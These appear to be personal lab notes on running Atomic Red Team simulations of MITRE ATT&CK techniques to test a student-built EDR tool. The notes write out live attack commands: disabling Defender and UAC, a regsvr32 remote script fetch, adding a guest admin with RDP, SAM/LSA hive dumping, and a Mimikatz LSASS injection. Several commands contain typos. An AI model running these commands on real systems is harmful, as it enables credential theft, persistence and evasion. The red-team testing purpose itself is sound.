atomicRedTeam:

> use to check the security of the system use simulated attack like Mitre Att&ck
framework.

> Setup the machine for simulated attack::

> go to the location of : https://github.com/redcanaryco/invoke-atomicredteam and

download the zip file.

> Create a folder at c: drive as atomicRedTeam.

> copy the zip file on that folder and unzip that. BTW we have to update the
windows security and TURN OFF the real time protection.

> invoke-atomicredteam-master > invoke-atomicredteam and atomic-red-team-master >

atomic-red-team 2 folders are there to unzip.

> from the powershell window prompt run : powershell -exec bypass

> run : Instll-Module -Name invoke-atomicredteam,powershell-yaml -Scope CurrentUser

> Importing module : run the script: > Import-Module "C:\AtomicRedTeam\invoke-

atomicredteam\Invoke-AtomicRedTeam.psd1" -Force

> now simulate the attack from Mitre Att&ck framework and select a tactics like
T1016: System Network Configuration Discovery.

> get-module find the installed module that are present in the export field.
Invoke-AtomicredTeam

> run : Invoke-AtomicTest 1016 -ShowDetailsBrief

> run : Invoke-AtomicTest 1016 -ShowDetails

> run : Invoke-AtomicTest -CheckPrereqs (Pre-Requi test for the system)

> run : Invoke-AtomicTest -getPrereqs (Pre-Requi test for the system)

> run the test : Invoke-Atomictest T1016

> run the specific test of T1016 : Invoke-AtomicTest T1016 -TestNumbers 2 >
(T1016-2: List Windows Firewall Rules.)

> Now check another techniques of Priviledges Escalation: Process Injection :

T1055

> run : Invoke-AtomicTest 1055 -ShowDetailsBrief

> run : Invoke-AtomicTest 1055 -ShowDetails

> run the specific test of T1016 : Invoke-AtomicTest T1055 -TestNumbers 2 >
(T1055-2: remote Process Injection in LSASS via Mimikatz.)

> clean-up the test : Invoke-AtomicTest T1055 -Cleanup

> clean-up the test : Invoke-AtomicTest T1016 -Cleanup

EDR : Endpoint detection and response refers to a category of tools used to detect
and investigate threats on endpoints. EDR tools typically provide detection,
investigation, threat hunting, and response capabilities.

Why i need EDR solution?

EDR solutions are very effective in collecting continuous information on malware

footprints and other types of potential cyber threats to the network. Such data is
stored on the network endpoints which helps in preparing suitable incident response
and management strategies.

What is the difference between EDR and SIEM?

EDR is better at detecting threats that are already on the endpoint, such as
malware infections. EDR can also collect detailed information about threats, which
can be helpful for investigating and responding to incidents. SIEM is better at
detecting threats that are coming into the network, such as malicious traffic.

What is the disadvantage of EDR?

While EDR solutions offer robust protection against advanced threats, they also
come with certain drawbacks. One of the primary disadvantages is the possibility of
false positives, which can lead to unnecessary investigations, wasting valuable
time and resources.

EDR can detect threats like ransomware and malware.

EDR solutions keep track of all devices, hunting down any suspicious movements on
the network. They collect information from endpoints and use this to stop threats
and assess previous and ongoing attacks. Legacy tools like antivirus software and
firewalls can detect known threats through signature-based detection.

endpointDetectionResponseEDR:

> Endpoint Detection and Response (EDR), also known as Endpoint Threat Detection
and Response (ETDR).

> Disable Microsoft Defender before executing or monitoring or implementing any red
team test activity or Atomic Red Team Mitre Attack framework command.
>> Set-MpPreference -DisableRealtimeMonitoring $true

> EDR test software based application tool (API) called BLUESPAWN developed by
students UofVirginia for testing purpose not for practical use.

> installing blueSpawn acting EDR:

(https://github.com/strandjs/IntroLabs/blob/master/IntroClassFiles/Tools/
IntroClass/bluespawn/Bluespawn.md)
> BlueSpawn only detect the wired behaviour but not protect it.
>> ./BLUESPAWN-client-x64.exe --monitor --level Cursory (it install some Tactics
and techniques of Mitre Att&ck framework for monitoring purposes)

> use atomic red team to test the BlueSpawn EDR working ability.
(https://github.com/redcanaryco/atomic-red-team)
>> Install thhe atomic red team :
>>> cd c:\AtomicRedTeam\invoke-atomicredteam\
>>> Install-Module -Name powershell-yaml
>>> Import-Module .\Invokee-AtomicRedTeam.psm1
>>> Invoke-AtomicTest All
after test has been tested ad analysed next would be clean up the machine.
>>> Invoke-AtomicTest All -Cleanup

Lab Test :

> basic Atomic Yest (Regsvr32)

> chain reaction
> measure progress and impact

Chaining Multiple Atomic Test: RedCanaryLabsOne.bat

:: Step 1: A Payload execute Regsvr32.exe as seen in LAB one T1117

>> regsrv32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-

team/master/Windows/Payloads/RegSvr32.sct scrobj.dll

:: Step 2: This Payload will execute an discovery sequence T1087

>> net user Administrator /domain & net Accounts & net localgroup administrators &
net use & net share & net group "domain admins" /domain & net config workstation &
net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\
Microsoft"

:: Step 3: We Will set up some persistence y creating a scheduled task T1053

>> SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10

> We will also ust go ahead and clean up the task.

>> SCHTASKS /Delete /TN Spawn /F

ATOMIC TEST #1: GUEST ACCOUNT ENABLED >> T1078.001

> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v

"AllowTSConnections" /t REG_DWORD /d 0x1 /f

Explanation:

>> Explanation of the command:

The command you provided seems to attempt to modify the Windows Registry to allow
Remote Desktop connections by setting the value of "AllowTSConnections" under the
specified registry key.

:: reg add: This command is used to add a new entry to the registry.
:: "HKLM\System\CurrentControlSet\Control\Terminal Server": This is the correct
registry key where the setting for Remote Desktop connections is located.
:: /v "AllowTSConnections": This specifies the name of the registry value we want
to modify.
:: /t REG_DWORD: This specifies the data type of the registry value as DWORD.
:: /d 0x1: This sets the data of the registry value to 1, which means Remote
Desktop connections are allowed.
:: /f: This forces the command to execute without asking for confirmation.

> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v

fDenyTSConnections /t REG_DWORD /d 0 /f

>> Explanation of the command:

The command you've provided attempts to modify the Windows Registry to enable
Remote Desktop connections by changing the value of fDenyTSConnections under the
specified registry key.

:: reg add: This command is used to add a new entry to the registry.
:: "HKLM\System\CurrentControlSet\Control\Terminal Server": This is the registry
key where the setting for Remote Desktop connections is located.
:: /v fDenyTSConnections: This specifies the name of the registry value we want to
modify.
:: /t REG_DWORD: This specifies the data type of the registry value as DWORD.
:: /d 0: This sets the data of the registry value to 0, which means Remote Desktop
connections are enabled.
:: /f: This forces the command to execute without asking for confirmation.

> net localgroup "Remote Desktop Users" guest_user /add

This command adds the user account named "guest_user" to the "Remote Desktop Users"
group, allowing them to connect to the system via Remote Desktop.

> net localgroup administrators guest_user /add

The command you provided is almost correct. It's used to add a user to the local
administrators group on a Windows system.

> net user guest_user guest_password /add

To create a new user account with a specific password using the command prompt on a
Windows system.

> net user guest_user /active:yes

It seems like you're attempting to activate a guest user account on a Windows

system using the command prompt.

ATOMIC TEST #2: REGISTRY DUMP OF SAMS, CREDS AND SECRETS >> T1003.002

> Local SAM :: HKLM\sam

> Cached credentials :: HKLM\system
> LSA secrets :: HKLM\security

> reg save HKLM\sam %temp%\sam

Explanation of the command:

:: reg save: This command is used to save a copy of a registry key and its subkeys
and values to a file.
:: HKLM\sam: This specifies the registry key to be saved. In this case, it's the
SAM registry hive, which contains user account information.
:: "%temp%\sam": This specifies the path and filename where the registry hive will
be saved. %temp% is an environment variable representing the temporary directory,
and "sam" is the filename.

> reg save HKLM\system %temp%\system

> reg save HKLM\security %temp%\security

Cleanup Commands ::

> del %temp%\sam >nul 2> nul

Explanation of the command:

:: del: This command is used to delete files.

:: "%temp%\sam": This specifies the file path to delete. %temp% is an environment
variable that represents the temporary directory, and "sam" is the name of the file
to be deleted.
:: >nul: This part of the command redirects the normal output (stdout) to nul,
which essentially discards it. This prevents any messages about the deletion from
being displayed.
:: 2>nul: This part of the command redirects error output (stderr) to nul,
discarding any error messages that might occur during the deletion process.

This command will attempt to delete the "sam" file from the temporary directory
silently, without displaying any messages, whether the deletion is successful or
not.

> del %temp%\system >nul 2> nul

> del %temp%\security >nul 2> nul

ATOMIC TEST #3: DISABLEE UAC USING reg.exe >> T1548.002

Disable User Account Control (UAC) using the builtin tool reg.exe by changing its
registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
EnableLUA from 1 to 0.

> reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v

EnableLUA /t REG_WORD /d 0 /f

The command you provided aims to add or modify a registry entry related to User
Account Control (UAC) settings on a Windows system

:: reg.exe ADD: This command is used to add a new registry entry or modify an
existing one.
:: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System: This specifies
the registry key where the UAC settings are located.
:: /v EnableLUA: This specifies the name of the registry entry to be added or
modified. EnableLUA stands for "Enable User Account Control."
:: /t REG_DWORD: This specifies the data type of the registry entry as DWORD (a 32-
bit integer).
:: /d 0: This sets the data of the registry entry to 0, which typically means that
User Account Control (UAC) is disabled. (Setting it to 1 would enable UAC.)
:: /f: This flag is used to force the operation without prompting for confirmation.

Please be aware that modifying UAC settings can significantly affect the security
and stability of your system. Disabling UAC may expose your system to potential
security risks, so it should be done with caution and only if absolutely necessary.

Cleanup Commands:

> reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v

EnableLUA /t REG_DWORD /d 1 /f

:: /d 1: This sets the data of the registry entry to 1, enabling User Account
Control (UAC).